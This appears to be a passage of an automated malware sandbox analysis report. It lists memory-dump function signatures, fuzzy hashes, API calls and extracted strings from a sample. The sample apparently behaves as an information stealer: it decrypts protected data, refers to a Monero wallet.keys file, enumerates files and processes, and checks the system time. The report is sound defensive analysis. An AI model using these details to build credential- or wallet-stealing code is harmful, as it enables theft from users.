                             • Associated: 00000000.00000002.1729779509.000000000060E000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1729779509.0000000000790000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1729779509.0000000000865000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1729779509.0000000000889000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1729779509.0000000000892000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1729779509.00000000008A1000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1730050524.00000000008A2000.00000080.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1730162551.0000000000A34000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1730178781.0000000000A35000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                            • String ID: /
                            • API String ID: 3090951853-4001269591
                            • Opcode ID: 9c655ba18acc895f1b9b084cf76610ece96482c25c522f936abb988cd8b772e1
                            • Instruction ID: 17cf1d60a44c48f23c615e98031716b4f6528423e101a471ed6c012bb636206c
                            • Opcode Fuzzy Hash: 9c655ba18acc895f1b9b084cf76610ece96482c25c522f936abb988cd8b772e1
                            • Instruction Fuzzy Hash: FB415D7194021CABCB25DB94DC99FEEB7B8FF54704F204199E40AA6290DB742F85CFA1
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1729779509.000000000060E000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                             • Associated: 00000000.00000002.1729580808.00000000003B0000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1729604238.00000000003B1000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1729604238.0000000000461000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1729604238.000000000046D000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1729604238.0000000000492000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1729604238.00000000005FA000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1729779509.0000000000790000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1729779509.0000000000865000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1729779509.0000000000889000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1729779509.0000000000892000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1729779509.00000000008A1000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1730050524.00000000008A2000.00000080.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1730162551.0000000000A34000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1730178781.0000000000A35000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: F{:=$de\$hC>s$i$_$sfoM$sfoM$xF1u
                            • API String ID: 0-1316170999
                            • Opcode ID: a3b7547ab521d4792f676162bcf3f4cb5525b1b3c57bef7c4b8d08593d0c777c
                            • Instruction ID: ab053a0bca62060d9e15e83c6d1adfb14ece745b8104dea6664acc1ea2d5b90c
                            • Opcode Fuzzy Hash: a3b7547ab521d4792f676162bcf3f4cb5525b1b3c57bef7c4b8d08593d0c777c
                            • Instruction Fuzzy Hash: C0B2E4F360C200AFE704AE2DEC8567ABBE5EF94720F16892DE6C4C7744EA3558418797
                            APIs
                              • Part of subcall function 003CA740: lstrcpy.KERNEL32(003D0E17,00000000), ref: 003CA788
                              • Part of subcall function 003CA920: lstrcpy.KERNEL32(00000000,?), ref: 003CA972
                              • Part of subcall function 003CA920: lstrcat.KERNEL32(00000000), ref: 003CA982
                              • Part of subcall function 003CA9B0: lstrlen.KERNEL32(?,01088F58,?,\Monero\wallet.keys,003D0E17), ref: 003CA9C5
                              • Part of subcall function 003CA9B0: lstrcpy.KERNEL32(00000000), ref: 003CAA04
                              • Part of subcall function 003CA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 003CAA12
                              • Part of subcall function 003CA8A0: lstrcpy.KERNEL32(?,003D0E17), ref: 003CA905
                            • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,003D0D73), ref: 003BE4A2
                            • StrCmpCA.SHLWAPI(?,003D14F8), ref: 003BE4F2
                            • StrCmpCA.SHLWAPI(?,003D14FC), ref: 003BE508
                            • FindNextFileA.KERNEL32(000000FF,?), ref: 003BEBDF
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1729604238.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                            • String ID: \*.*
                            • API String ID: 433455689-1173974218
                            • Opcode ID: 5463269557e8bc0ea8c69c04cee98bbc8f54d0a7a486fe20a4f8bd6155537c53
                            • Instruction ID: cae9fdf192c7f3fac64f1f8c94414325effafbf5df59591fd10dfd917382d9fc
                            • Opcode Fuzzy Hash: 5463269557e8bc0ea8c69c04cee98bbc8f54d0a7a486fe20a4f8bd6155537c53
                            • Instruction Fuzzy Hash: AC124C7290061C9BDB1AFB60DC96FED7378AF54304F4041ADA50ADA191EF346F49CBA2
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1729779509.000000000060E000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: 2+k$MF1m$\}7$`c$fAU]$sz
                            • API String ID: 0-1251302725
                            • Opcode ID: b114735b526981fdf5099c641638c92c007e1554f885b2a231cfd0d34bfac973
                            • Instruction ID: 2b989d5a47f671d4aa16027000a1de1002fa3e50497738b769fca5955c6ce5c5
                            • Opcode Fuzzy Hash: b114735b526981fdf5099c641638c92c007e1554f885b2a231cfd0d34bfac973
                            • Instruction Fuzzy Hash: 4AB25BF360C204AFE3046E2DEC8577AFBD9EF94220F1A453DEAC5D3744EA3598058696
                            APIs
                            • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N;,00000000,00000000), ref: 003B9AEF
                            • LocalAlloc.KERNEL32(00000040,?,?,?,003B4EEE,00000000,?), ref: 003B9B01
                            • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N;,00000000,00000000), ref: 003B9B2A
                            • LocalFree.KERNEL32(?,?,?,?,003B4EEE,00000000,?), ref: 003B9B3F
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1729604238.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: BinaryCryptLocalString$AllocFree
                            • String ID: N;
                            • API String ID: 4291131564-1002446643
                            • Opcode ID: b0294fdd27bebf49439c40c05f689623e5bb39f827b5152a9bab11e3b2faf213
                            • Instruction ID: 93ea7029b0fedafe253c75bf2e29026be616577140272f261b31caf22be047ee
                            • Opcode Fuzzy Hash: b0294fdd27bebf49439c40c05f689623e5bb39f827b5152a9bab11e3b2faf213
                            • Instruction Fuzzy Hash: EE11AFB4240308EFEB10CF64DC95FAA77B5FB89704F208059FA199B390C7B6A901DB91
                            APIs
                            • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 003BC871
                            • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 003BC87C
                            • lstrcat.KERNEL32(?,003D0B46), ref: 003BC943
                            • lstrcat.KERNEL32(?,003D0B47), ref: 003BC957
                            • lstrcat.KERNEL32(?,003D0B4E), ref: 003BC978
                            Memory Dump Source
                            • Source File: 00000000.00000002.1729604238.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$BinaryCryptStringlstrlen
                            • String ID:
                            • API String ID: 189259977-0
                            • Opcode ID: a22307d8a4994be6895592253d016eec1a35c4ce24c6021dda1c231b2e325bc1
                            • Instruction ID: 19b463ccca9eb01b02e371e896b6914685e142726e512cd7d513208c31ab0115
                            • Opcode Fuzzy Hash: a22307d8a4994be6895592253d016eec1a35c4ce24c6021dda1c231b2e325bc1
                            • Instruction Fuzzy Hash: 484184B5D14219DFDB10DFA0DC84BFEB7B8BB48704F1045A9E509E6280D7749A84DF92
                            APIs
                            • GetSystemTime.KERNEL32(?), ref: 003C696C
                            • sscanf.NTDLL ref: 003C6999
                            • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 003C69B2
                            • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 003C69C0
                            • ExitProcess.KERNEL32 ref: 003C69DA
                            Memory Dump Source
                            • Source File: 00000000.00000002.1729604238.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Time$System$File$ExitProcesssscanf
                            • String ID:
                            • API String ID: 2533653975-0
                            • Opcode ID: ac216c0b4e59a73d36cf6312bf1f61f05a167422172e41d5c128fb3d37db00fb
                            • Instruction ID: 3e3166f1be83cf63d12d0a943f16e6e5b5e4db1bbadbc4c54f34334badb515a0
                            • Opcode Fuzzy Hash: ac216c0b4e59a73d36cf6312bf1f61f05a167422172e41d5c128fb3d37db00fb
                            • Instruction Fuzzy Hash: 5321BAB5D14208ABCF05EFE4D945EEEB7B5BF58300F04852EE40AE3250EB745609DBA6
                            APIs
                            • GetProcessHeap.KERNEL32(00000008,00000400), ref: 003B724D
                            • RtlAllocateHeap.NTDLL(00000000), ref: 003B7254
                            • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 003B7281
                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 003B72A4
                            • LocalFree.KERNEL32(?), ref: 003B72AE
                            Memory Dump Source
                            • Source File: 00000000.00000002.1729604238.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                            • String ID:
                            • API String ID: 2609814428-0
                            • Opcode ID: b5a1342ac4747e14881cf220eeae5fc8223c4974fd82d33b277313065604771e
                            • Instruction ID: 7b0344d177731566c31b410a3b4cf4363b15ab9ef9c4f30f4222abd0fcd7c18a
                            • Opcode Fuzzy Hash: b5a1342ac4747e14881cf220eeae5fc8223c4974fd82d33b277313065604771e
                            • Instruction Fuzzy Hash: 620152B5A40208BBEB14DFE4CD49FAD7778EB44B04F104455FB09EB2C0C6B4AA04DB66
                            APIs
                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 003C961E
                            • Process32First.KERNEL32(003D0ACA,00000128), ref: 003C9632
                            • Process32Next.KERNEL32(003D0ACA,00000128), ref: 003C9647
                            • StrCmpCA.SHLWAPI(?,00000000), ref: 003C965C
                            • CloseHandle.KERNEL32(003D0ACA), ref: 003C967A
                            Memory Dump Source
                            • Source File: 00000000.00000002.1729604238.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                            • String ID:
                            • API String ID: 420147892-0
                            • Opcode ID: d421f4625f9ebf5b5b412f00118d855793a9ba9e59c7bd52ce87995e3f680fd7
                            • Instruction ID: 2287f26e9c57474498a25ce06033287e39e502ad89ce26b2fb82101aa2c18adf
                            • Opcode Fuzzy Hash: d421f4625f9ebf5b5b412f00118d855793a9ba9e59c7bd52ce87995e3f680fd7
                            • Instruction Fuzzy Hash: 160129B5A00208ABCB11DFA5CC48FEDB7F8EB18350F004189A909D7280D774AE54DF52
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1729779509.000000000060E000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: /Mz=$H0=~$pzw~$V
                            • API String ID: 0-2595791368
                            • Opcode ID: 589b8f1234094e8552a2a14841b8df06779cd5a9f1a78def43ab78ba4c85fda4
                            • Instruction ID: 10a16b26ebf16f156d1f276ef54473b88d1f9471030d63da96bfb8996334ea7c
                            • Opcode Fuzzy Hash: 589b8f1234094e8552a2a14841b8df06779cd5a9f1a78def43ab78ba4c85fda4
                            • Instruction Fuzzy Hash: 3CB2D3F36086009FE3046E2DEC8567ABBE9EF94720F1A493DEAC4C7744E63598458793
                            APIs
                            • CryptBinaryToStringA.CRYPT32(00000000,003B5184,40000001,00000000,00000000,?,003B5184), ref: 003C8EC0
                            Memory Dump Source
                            • Source File: 00000000.00000002.1729604238.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: BinaryCryptString
                            • String ID:
                            • API String ID: 80407269-0
                            • Opcode ID: 5df83ece443cdcf1ba8012e2d24e82cac3a8121cc01b4af6f2a0b78490204729
                            • Instruction ID: 45874cb25dfa6948ca599de24d5eb8488e7d7696a26d1e11297adf3d7869b699
                            • Opcode Fuzzy Hash: 5df83ece443cdcf1ba8012e2d24e82cac3a8121cc01b4af6f2a0b78490204729
                            • Instruction Fuzzy Hash: 9D11F2B0200208AFDB01CF64E884FAA37A9AF89354F10945CF919CB250DB75EE41EB61
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,0108E398,00000000,?,003D0E10,00000000,?,00000000,00000000), ref: 003C7A63
                            • RtlAllocateHeap.NTDLL(00000000), ref: 003C7A6A
                            • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,0108E398,00000000,?,003D0E10,00000000,?,00000000,00000000,?), ref: 003C7A7D
                            • wsprintfA.USER32 ref: 003C7AB7
                            Memory Dump Source
                            • Source File: 00000000.00000002.1729604238.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                            • String ID:
                            • API String ID: 3317088062-0
                            • Opcode ID: 01f959b6c8faf8de0bf67fbf4225dc58baf8eb8aded2842216fe98908545cae4
                            • Instruction ID: 26909fb9923104ca2eae302bf0679f1fb2c6c100bfc5999f162ecff1e5d280c1
                            • Opcode Fuzzy Hash: 01f959b6c8faf8de0bf67fbf4225dc58baf8eb8aded2842216fe98908545cae4
                            • Instruction Fuzzy Hash: DB115EB1D45218EBEB209B54DC49FA9B778FB04761F10439AE91AD32C0D7785E44CF52
                            APIs
                            • CoCreateInstance.COMBASE(003CE118,00000000,00000001,003CE108,00000000), ref: 003C3758
                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 003C37B0
                            Memory Dump Source
                            • Source File: 00000000.00000002.1729604238.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                            • Associated: 00000000.00000002.1729580808.00000000003B0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729604238.0000000000461000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729604238.000000000046D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729604238.0000000000492000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729604238.00000000005FA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729779509.000000000060E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729779509.0000000000790000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729779509.0000000000865000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729779509.0000000000889000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729779509.0000000000892000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729779509.00000000008A1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1730050524.00000000008A2000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1730162551.0000000000A34000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1730178781.0000000000A35000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: ByteCharCreateInstanceMultiWide
                            • String ID:
                            • API String ID: 123533781-0
                            • Opcode ID: 3da090dcc2a5c4891ee76d4571ba96fafe6db74090e05c86fdfc43367d9b56cc
                            • Instruction ID: ab1bf2922a741208f6d4d9f76612c8c670de9a1100800aebc8b02b5e5642e6a0
                            • Opcode Fuzzy Hash: 3da090dcc2a5c4891ee76d4571ba96fafe6db74090e05c86fdfc43367d9b56cc
                            • Instruction Fuzzy Hash: 6341E870A40A289FDB24DB58CC95F9BB7B5BB48702F4081D8E609EB2D0D7716E85CF50
                            APIs
                            • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 003B9B84
                            • LocalAlloc.KERNEL32(00000040,00000000), ref: 003B9BA3
                            • LocalFree.KERNEL32(?), ref: 003B9BD3
                            Memory Dump Source
                            • Source File: 00000000.00000002.1729604238.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                            • Associated: 00000000.00000002.1729580808.00000000003B0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729604238.0000000000461000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729604238.000000000046D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729604238.0000000000492000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729604238.00000000005FA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729779509.000000000060E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729779509.0000000000790000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729779509.0000000000865000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729779509.0000000000889000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729779509.0000000000892000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729779509.00000000008A1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1730050524.00000000008A2000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1730162551.0000000000A34000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1730178781.0000000000A35000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Local$AllocCryptDataFreeUnprotect
                            • String ID:
                            • API String ID: 2068576380-0
                            • Opcode ID: 31d4c5ae181dcd8a9185cce1ebe8b668761037313d3081ef96f01a9a08d3ed29
                            • Instruction ID: ac1900e053dad25d11a411a7534562a26dde0c2cd9aea49040ab5302a07af5d6
                            • Opcode Fuzzy Hash: 31d4c5ae181dcd8a9185cce1ebe8b668761037313d3081ef96f01a9a08d3ed29
                            • Instruction Fuzzy Hash: 0D11FAB4A00209DFDB04DFA4D985AAE77B5FF88300F104559E91597350D774AE14CF62
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1729779509.000000000060E000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                            • Associated: 00000000.00000002.1729580808.00000000003B0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729604238.00000000003B1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729604238.0000000000461000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729604238.000000000046D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729604238.0000000000492000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729604238.00000000005FA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729779509.0000000000790000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729779509.0000000000865000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729779509.0000000000889000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729779509.0000000000892000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729779509.00000000008A1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1730050524.00000000008A2000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1730162551.0000000000A34000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1730178781.0000000000A35000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: VO}$e^\
                            • API String ID: 0-920810836
                            • Opcode ID: af17d5128f67cacc82b4b925829b1deecb360c621ce780800163eb0362aac5d0
                            • Instruction ID: ac603e0885a0f53d2fcd4bbad45e6611999c52c850a4e78d6067ec594331bc3c
                            • Opcode Fuzzy Hash: af17d5128f67cacc82b4b925829b1deecb360c621ce780800163eb0362aac5d0
                            • Instruction Fuzzy Hash: AEA2C2F3A0C6049FE704AE29EC8577AFBE5EF94320F16493DEAC583740E63558148A97
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1729779509.000000000060E000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                            • Associated: 00000000.00000002.1729580808.00000000003B0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729604238.00000000003B1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729604238.0000000000461000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729604238.000000000046D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729604238.0000000000492000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729604238.00000000005FA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729779509.0000000000790000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729779509.0000000000865000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729779509.0000000000889000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729779509.0000000000892000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729779509.00000000008A1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1730050524.00000000008A2000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1730162551.0000000000A34000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1730178781.0000000000A35000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: (^r$(^r$\>]
                            • API String ID: 0-4038120701
                            • Opcode ID: 0efd409c2623d495d3b02bfb3760742ec10ce0a74daded5bc25857b5fd743ad7
                            • Instruction ID: 7feef52345e92feba3c7dce42c1c17d23d3781d55ea4ae8725cccd1764426742
                            • Opcode Fuzzy Hash: 0efd409c2623d495d3b02bfb3760742ec10ce0a74daded5bc25857b5fd743ad7
                            • Instruction Fuzzy Hash: 12718AF3E086145FE3106E29DC8476ABBD6EFD4720F1A853ED9C893784E938590586D2
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1729779509.0000000000889000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                            • Associated: 00000000.00000002.1729580808.00000000003B0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729604238.00000000003B1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729604238.0000000000461000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729604238.000000000046D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729604238.0000000000492000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729604238.00000000005FA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729779509.000000000060E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729779509.0000000000790000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729779509.0000000000865000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729779509.0000000000892000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729779509.00000000008A1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1730050524.00000000008A2000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1730162551.0000000000A34000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1730178781.0000000000A35000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: i1;Y
                            • API String ID: 0-1824976474
                            • Opcode ID: e2a41fc50830354304e2f4a6285e98d922513e8ec30e4b6cf5de969ec38f0136
                            • Instruction ID: 1f69db382a879fe02325e8920757adf2456649a28ac831477149ca001a0be4c2
                            • Opcode Fuzzy Hash: e2a41fc50830354304e2f4a6285e98d922513e8ec30e4b6cf5de969ec38f0136
                            • Instruction Fuzzy Hash: 00C1BEF3A082049FE7085E2CEC817B7B7D5EB94310F29853DEA85D3784F97A58048785
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1729779509.000000000060E000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                            • Associated: 00000000.00000002.1729580808.00000000003B0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729604238.00000000003B1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729604238.0000000000461000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729604238.000000000046D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729604238.0000000000492000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729604238.00000000005FA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729779509.0000000000790000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729779509.0000000000865000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729779509.0000000000889000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729779509.0000000000892000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729779509.00000000008A1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1730050524.00000000008A2000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1730162551.0000000000A34000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1730178781.0000000000A35000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: FD~^
                            • API String ID: 0-3586643306
                            • Opcode ID: 904428389c531fda41183f01fc096512fb4e709fa4d43c59b4a3ee45d7bbb6cd
                            • Instruction ID: df8ecff7287ed2ae5686b4925b0938c01f9e7f2f9e820ece168ee65605174474
                            • Opcode Fuzzy Hash: 904428389c531fda41183f01fc096512fb4e709fa4d43c59b4a3ee45d7bbb6cd
                            • Instruction Fuzzy Hash: D24105F7F192004BE3049A3DED8472A76DBDBD4721F2F853DE688D3788E93998054256
                            Memory Dump Source
